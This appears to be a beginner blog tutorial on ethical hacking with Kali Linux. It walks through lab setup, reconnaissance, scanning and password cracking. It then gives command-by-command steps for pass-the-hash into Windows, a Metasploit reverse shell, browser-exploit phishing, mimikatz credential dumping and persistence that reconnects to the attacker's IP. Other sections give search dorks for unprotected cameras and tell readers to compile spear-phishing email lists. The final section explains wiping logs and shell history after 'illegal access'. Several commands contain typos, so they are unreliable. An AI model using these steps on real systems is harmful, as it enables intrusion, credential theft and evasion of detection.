Hi, here we want to talk about Linux operating systems. We start with kali linux and ethical hacking with more than 300 programs. In this century we need to know what we know and others force us to know, ethical hacking is useful to know about information technology, networks, securities, politics, dark web and etc. these words and topics are interesting and easy as their names!

1) Kali Linux

Kali Linux is an open source project that is maintained and funded by Offensive Security. Kali is a Debian-derived Linux distribution designed for digital forensics and penetration testing.

kali linux desktop (workspace)

1-1) install kali

Step 1 : choose your system. We need to know our system’s information by typing “systeminfo” in cmd (or shell) of windows. Check your system type (x86 (32bit) or x64(64bit)), processors and total physical memory.

Step 2 : Choose between virtual, live and installed operating systems, Here we will discuss about virtual machines, so we need to install VirtualBox or VMware.

Step 3 : Download kali linux from . Now we see three option as kali installation *.iso file, kali in VMware and kali in Virtual Box. Installation *.iso file is preferred but for simplicity we could choose VirtualBox!

Step 4 : Run Virtual box then you’ll see something like below, click on New then choose a name. In image you see advanced mode but you could choose guided mode instead. choose memory to half of your total physical memory then choose “Use an existing virtual hard disk file” and click on create. It’s done!

kali installation in VirtualBox

1-2) Lab Setup

All techniques that you learn in ethical hacking needs to done in a safe network on your computer, otherwise you’ll need permission of owners or administrators.

To build a safe test environment we need a lab! As advantage of technologies we could build a safe lab in our system with virtualization and Virtualbox or VMware are enough!

Step 1 : Download or buy windows xp, 7, 8.1, 10 for windows operating systems. Microsoft had removed links for all VM (virtual machine) of windows (at least I can’t find!) except last one windows 10 that could be downloaded by . Installation of this files are same as kali VM.

Step 2 : Download metasploitable from .The default login and password for metasploitable is msfadmin. Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.

Metasploitable 2 running on VirtualBox

Warning : Never expose Metasploitable to an untrusted network, use NAT or Host-only mode!

1-3) Reconnaissance

Reconnaissance refers to intelligent gathering or probing to assess the vulnerabilities of a network, to successfully launch a later attack; it includes footprinting the target (also known as profiling or information gathering).

Step 1 : The answer of (why? when? who? what? how? where?) are required to know about target. then we plan to get network range, available and active systems, operating systems, network map. we have tools like Maltego, Nmap and techniques like google hacking.

why? when? who? what? how? where?

Step 2 : Gather common and public information by asking, website, advertisements, catalogues, services, customers, products, and reports. we could use indeed, monster, career builder, dice, … websites for reports like 10K annual reports. For example we look for recruitment notices and we find out they need skills about windows 10, excel, peoplesoft, Origin, Skype, … then we could search for these softwares vulnerabilities!

10k annual report

Step 3 : Use ordinary tools like google earth or google map to know about geographical information. Unfortunately most hacks are related to wireless attack and if just one employee gives information unawarely, whole company will get into danger. All standard security protocols must be done in any way!

Google Earth New York

Step 4 : Search in advanced mode! every search engine has this feature to search accurately as an expert.Let’s try google “ext:pdf supernova”, you’ll see all links with *.pdf format that contain supernova as keyword. Try “inurl:view/index.shtml” to access unprotected CCTV camera, “allinurl:defalt.html” to find login pages (sometimes without MOTD warning!). Sometime we could find interesting points like backdoor!

Unprotected Live Camera

Step 5 : Assemble all information to get relations between them. Prepare a list of emails for spear phishing. Sometimes Social Engineering work amazingly like magics like shoulder surfing!

Social Engineering Attacks

1-4) Scanning

Step 1: DNS (Domain Name System) converts names to IP, DNS has records that indicates specific functions as :

DNS Records

DNS threats are important as Zone files, Flood attack, cache poisoning and DNS footprinting, Man in the Middle.

DNS threads

Here we have tools like : wireshark, packet captures( , Domain name analyzers, … .

Step 2 : In shell “ping” and in terminal use “ping -c3” to know ip address and states like target is active or not.Use “Tracert” to know the path your computer takes to reach, sometimes you find out something is wrong!. Use “pathping” to get combined features of ping & tracert plus analysis of packages. You could use websites like to access all mentioned information by your smartphones! For Whois information use “dmitry -pb”. use “dnsenum” to enumerate system information.


Step 3 : path analysis. With Nslookup, dig, path analyzer, visual route … we could find more information. Use “nslookup”, “dig” in terminal. Maltego is one of open-source intelligence gathering software that has free version. to install use “sudo apt-get update && sudo apt-get install maltego”, by default kali has community version.


For service profiling use “nikto -h” (replace ip for your VM). Open vulnerability assessment system (OpenVas) is a tool for vulnerability discovery in a domain that has more features in CVE, port lists, warnings, etc.

OpenVAS scans on metasploitable 2

For website vulnerabilities we have Vega .use “sudo apt-get update && sudo apt-get install vega” or download packages and use “cd downloads”, “sudo dpkg -i Vega.deb” and “sudo apt-get install -f”. Be root by “sudo -s” and use “./Vega” to run vega from extracted directory. Create new scan and enter website address. Vega has Proxy mode to be in the middle of your browser and web server, We could use this features to send and receive Get or other commands and see the responses.


1-5) Gaining access

To login into a system protected by encryption codes like Hash for passwords, we need to observe networks or use previous techniques.


Step 1 : For windows we have windows credentials editor (WCE), download it into windows VM by . Run CMD as administrator and type “wce -l”. Crackers use wordlist, Crunch, rsmangler, cewl, etc to create possible passwords. If you guess password you could generate hash from password by “wce -g password” and check the hash to match or crack it with john and johnny in kali. We could see linux hash by “cp /etc/shadow hash && cat hash”. Use john by “john hash && john –show hash. You could use telnet,ftp and ssh to transfer files and hashes! use “wce -l -o hash” to get output as file. Johnny is a GUi for john to crack passwords visually but remember to add john the ripper executable in settings of johnny to work (use “/usr/sbin/john”).

We could use brute force attacks to gain hash & password if we have time to do it! another accurate cracking for complex passwords comes with rainbow tables use “ls /usr/share/rainbowcrack” to list programs that available to use. To crack passwords from windows 6 character length, lowercase alphabetic we could generate rainbow tables by “rtgen ntlm loweralpha 6 6 0 3800 335540 0” with 335540 chain each length 3800 Byte. then sort table by “rtsort *.rt” then crack password by “rcrack *.rt -h ntlmhash”.

Step 2 : With gained information we could use lots of techniques. Pass the hash techniques gain access to target by username & password hash. when user logs in windows, Local security authority subsystem (lsass) hashes the password to gain access into system resources like single signed on access control property. Here we use path-winexe to pass the hash and gain access into windows system. use “pth-winexe -U userid%hash //ip cmd.exe” then we have access into system! then use “netstat -a” or “shutdown /s” to shutdown the target!!!

passing the hash to windows

1-6) Maintaining access

With metasploit we have assembling, encoding alongside of payloads use “metasploit” to run it, then use “help” to study options! I take an example how it’s working.
use “search win8” to search exploits
to set a exploit to run use “use /unix/irc/unreal_3281_backdoor”
look for exploit’s targets by “show targets”
to select target use “set target 0”
to see payloads use “show payloads”
to know more about payloads use “info cmd/unix/reverse”
to select payload use “set payload cmd/unix/reverse”
to see options of our combination sets use “show options”
to set host use “set lhost”
to set target system use “ser rhost”
to run exploit just use “exlpoit”
to check we are connected as remote system shell use “ifconfig eth0” for linux targets.
then you could check “whoami” to see who are you?!!, “ps” for running processes and “ctrl+c” to exit from remote shell.

Step 1 : To gain permanent access into system use exploits and payloads to gain access then use techniques like pivoting to be part of system for all eternity!!!

Step 2 : Here we use armitage, to install use “sudo apt-get update && sudo apt-get install armitage”. every time before running armitage use “/etc/init.d/postgresql start” then “armitage” otherwise you’ll see database not connected! Select exploits->windows->browser->ms14_064_ole_code_execution for phishing attack into windows xp & 7.specify host as kali IP and launch. This will run a server on kali that connects us to targets as they click in Local IP and open it in browser. Target’s information would appear in workstation and lightening around it means we have access now! Right click on target and select meterpreter 1->interact->meterpreter shell
First increase timeouts by “set_timeouts -x 3000”, be root by “getsystem”, “ps” to see running process, “migrate id” to hide exploit process in another process like explorer,”load mimikatz” then “kerberos” or “msv” to get users passwords and hash,”run persistence -h” to get permanent access,”run persistence -X -i 20 -p 443 -r yourIP” to reconnect target each 20 seconds into 443 port of your IP as it reboots.

1-7) Covering tracks

If we get illegal access to data we must know there is one clue at least to save our tracks. like when you have access into metasploitable from kali, use “uptime” and you’ll see two users are active!!! So to clear these messes up we have important things to do.

Step 1 : Don’t ever tell anybody anything! be patient, just tell truth to company you work with (truth will always conquer lies!). In metasploit as we get a meterpreter like one we had in armitage, use “clearev” to clear everything from target system. Look after log files, In linux delete logs or change them in paths like “/var/log/” and “kwrite /var/log/messages”.

Step 2 : Clear commands history by “Export HISTSIZE=0” that says nobody was here!!! Simply delete HISTORY file by “shred -zu root/.bash_history” or “history -c && history -w” instead.

Step 3 :In Armitage, use “exit” to disconnect meterpreter because it has a clean up script triggering by this command!

Always take notes and write good reports to cover every details and solutions clearly understandable.
~Be good, Be safe.

Share this Page